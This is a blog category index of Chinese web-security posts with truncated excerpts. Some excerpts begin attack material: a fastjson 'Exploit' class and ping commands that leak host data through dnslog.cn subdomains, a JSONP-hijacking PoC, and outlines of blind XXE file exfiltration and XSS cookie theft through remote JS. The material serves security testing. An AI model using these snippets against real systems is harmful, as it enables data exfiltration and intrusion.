随笔分类 -  security

渗透测试/安全工具/WEB安全等
centos 安装 masscan
摘要:# https://github.com/robertdavidgraham/masscan cd /opt yum install -y git gcc make libpcap-dev git clone https://github.com/robertdavidgraham/masscan 阅读全文
posted @ 2019-12-29 19:13 huim 阅读(2914) 评论(0) 推荐(0) 编辑
fastjson ping外带信息poc
摘要:``` public class Exploit { public Exploit(){ String base_url = ".egpkd5.dnslog.cn"; //你的dnslog地址 String win_dnslog = "windows" + base_url; // windows 阅读全文
posted @ 2019-12-07 10:43 huim 阅读(896) 评论(0) 推荐(0) 编辑
ping命令传递信息
摘要:``` IP: 适用于 eth0 inet addr: IP的情况 ping .vivo_fj_ip.q734y5p2.dnslog58.top ping ip. .kiwe2t.dnslog.cn 适用于 eth0 IP的情况 ping .vivo_fj_ip.q734y5p2.dnslog58. 阅读全文
posted @ 2019-12-06 04:31 huim 阅读(537) 评论(0) 推荐(0) 编辑
blind XXE payload
摘要:简单验证 接收信息以证明 XML的规范定义中,只有在DTD中才能引用参数实体. 参数实体的声明和引用都是以百分号%。并且参数实体的引用在DTD是理解解析的,替换文本将变成DTD的一部分。 要将信息发出来还需要再自己服务器上构造DTD。 1) 接收单行文件信息(主机名) 2) 接收多行文件信息 列目录 阅读全文
posted @ 2019-08-19 17:04 huim 阅读(547) 评论(0) 推荐(0) 编辑
内网端口映射+dnslog
摘要:以前的DNSLOG部署在公网上也即自己的服务器上,产品依赖个人的环境不是很好。于是做了修改。 框架 细节 1)A域名的域名服务器指向B域名 ns0.B.com ns1.B.com 2)B域名的两个ns0 与 ns1 作A记录到公网的IP上 3)公网通过VIP的方式将公网IP的53端口流量映射到内网服 阅读全文
posted @ 2019-07-02 21:13 huim 阅读(915) 评论(0) 推荐(0) 编辑
扫描QPS控制——celery任务分多队列运行
摘要:发包QPS控制,有两个难点。 1. redis交互流量的限制。 应对: 1)不在发包处做QPS控制,再往上游控制 2)如果该链接对应的业务没有QPS控制需求,就没必要限制也没必要交互了。 2. 睡眠 应对: 1)选择少量节点让其随便睡,再在最上游流量去重处做对应规则。 2)超过QPS的流量就丢弃。 阅读全文
posted @ 2019-06-19 21:45 huim 阅读(542) 评论(0) 推荐(0) 编辑
JSONP劫持
摘要:发出空refer的POC <!DOCTYPE html> <html> <head> <meta name="referrer" content="never"> </head> <body> <script> function asd(json){ alert(JSON.stringify(jso 阅读全文
posted @ 2019-06-11 20:47 huim 阅读(467) 评论(0) 推荐(1) 编辑
谈CSRF与JSONP设置header问题
摘要:关于前端发起请求 问题一 JS发起请求的方式 方法一 JS代码中发起请求的方式普遍为AJAX 该技术在 1998 年前后得到了应用。允许客户端脚本发送HTTP请求(XMLHTTP) 方法二 script标签请求 方法三 通过HTML的方法 通过js自动在jsp中创建一个form表单,并给其metho 阅读全文
posted @ 2019-06-11 20:41 huim 阅读(1818) 评论(0) 推荐(0) 编辑
SQL注入——知表名不知列明情景下查询数据
摘要:场景 有某些情况,可以查找到表名,但查找不到列名。 MySQL 阅读全文
posted @ 2019-04-28 11:52 huim 阅读(1852) 评论(1) 推荐(0) 编辑
xss 加载远程第三方JS
摘要:script 没有调用远程平台,用web接收cookie 简单的script链接远程第三方js,省略协议,浏览器自动加载当前页面的协议 img图片 图片创建script节点,链接远程第三方JS 图片创建其他节点,接收cookie details+ontoggle展开 details详细信息展开时触发 阅读全文
posted @ 2019-04-24 08:57 huim 阅读(2808) 评论(0) 推荐(0) 编辑
扫描器需求——产品的核心目标
摘要:今天晚上讨论下个季度扫描器的需求。 0x01 要重构么? 重构前提 扫描器可读性较差,当初理解的时候看了一两天理解了大致的流程。之后在写功能的过程中,又在一些地方卡住了。 另一方面,是代码耦合性太高了,程序运行依靠redis、celery、管理平台的任务功能、插件下载平台,和其他东西耦合性过高,无法 阅读全文
posted @ 2019-04-04 00:44 huim 阅读(314) 评论(0) 推荐(0) 编辑
sql预编译&动态语句静态语句
摘要:https://www.cnblogs.com/micrari/p/7112781.html https://www.cnblogs.com/MarsDing/p/9871703.html https://blog.csdn.net/lzl_avery/article/details/8277145 阅读全文
posted @ 2019-04-01 17:46 huim 阅读(475) 评论(0) 推荐(0) 编辑
关于我
摘要:方向: 信息安全 技能: 自动化扫描 & 扫描器 理想: 攻防 某两位数的数字互联网 阅读全文
posted @ 2018-08-31 22:46 huim 阅读(350) 评论(0) 推荐(0) 编辑
页面相似度检测
摘要:编写ldap扫描插件时,遇到的问题是,如何判断页面有变化。如果是已知的页面,可以根据页面中的字符串判断变化;如果是未知的页面,也就是通用页面,可以参考sqlmap: sqlmap中,页面相似度的判断位于 lib/request/comparison.py,其中 _comparison为核心判断函数。 阅读全文
posted @ 2018-08-16 22:11 huim 阅读(1365) 评论(0) 推荐(0) 编辑
CSRF自动化检测
摘要:CSRF自动化检测: 这里主要是对POST型form表单的检测 1. 根据URL获取form表单组成的数组 2. 遍历表单数组,对比不设置cookie与设置了cookie两种情况下的表单是否还存在,如果还存在就去除数组中的该表单。 因为不设置cookie没有登录态也能获取的表单、也能进行的操作对于C 阅读全文
posted @ 2018-03-06 00:22 huim 阅读(316) 评论(0) 推荐(0) 编辑
hash碰撞POC
摘要:hash碰撞POC: 该类型漏洞POC编写过程难点有二: 一. hash碰撞数据的产生或收集 二. 使用responseTime来判断是否存在hash,如何精确的得到 三. 如何估算出服务器的处理/响应时间,以用来判断是否存在漏洞。 github能找到hash碰撞的POC,使用python编写的 该 阅读全文
posted @ 2018-02-28 22:13 huim 阅读(273) 评论(0) 推荐(0) 编辑
竞争条件
摘要:测试竞争条件 以为有验证码不会有竞争条件。 但是被别人测出来有这个东西,复现学习一下。 burpsuite的intruder模块并不能成功,而自己写的threading+hackhttp也并不能成功。 最后外部白帽说是fiddle测试的,用fiddle测试,真的能实现竞争条件,一个扣钱实现多次购物。 阅读全文
posted @ 2017-12-28 23:15 huim 阅读(300) 评论(0) 推荐(0) 编辑
一个3389远程溢出漏洞的简单流量检测
摘要:CVE编号:CVE-2012-0002CNNVD编号:CNNVD-201203-241中文名:3389远程溢出漏洞/Microsoft Windows远程桌面协议代码执行漏洞原文地址:http://blog.csdn.net/jiayanhui2877/article/details/4702524 阅读全文
posted @ 2017-09-21 20:10 huim 阅读(4454) 评论(0) 推荐(0) 编辑